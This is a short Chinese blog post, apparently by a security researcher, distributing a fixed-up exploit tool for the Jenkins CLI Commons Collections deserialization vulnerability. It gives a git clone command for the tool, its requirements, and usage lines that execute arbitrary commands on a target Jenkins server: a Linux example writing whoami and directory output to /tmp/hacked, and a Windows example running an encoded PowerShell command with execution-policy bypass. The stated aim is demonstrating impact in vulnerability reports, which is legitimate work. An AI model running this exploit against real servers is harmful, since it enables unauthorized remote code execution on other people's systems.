MENU

Jenkins CommonCollections 完美利用(演示)工具

November 15, 2015 • Security

提交漏洞总是要证明漏洞危害,老外写的java代码又有bug,所以随手改掉了

点击这里下载代码,或者使用如下命令

git clone http://github.com/CaledoniaProject/jenkins-cli-exploit.git

jenkins_common_collections.jpg

工具的具体使用方法,

如果目标是 Linux、Mac 机器,请使用,

./client.pl --url http://127.0.0.1:8080/jenkins/ --os linux --cmd '{ whoami; ls -lh; } > /tmp/hacked'

如果是 Windows 机器,

./client.pl --url http://127.0.0.1:8080/jenkins/ --os win --cmd 'powershell -ep bypass -enc xxxxx'

环境要求,

确保你安装了 java、perl
确保你安装了 IPC::Run 这个PERL模块,安装方法为 cpan IPC::Run

Tags: Jenkins
Archives QR Code
QR Code for this page
Tipping QR Code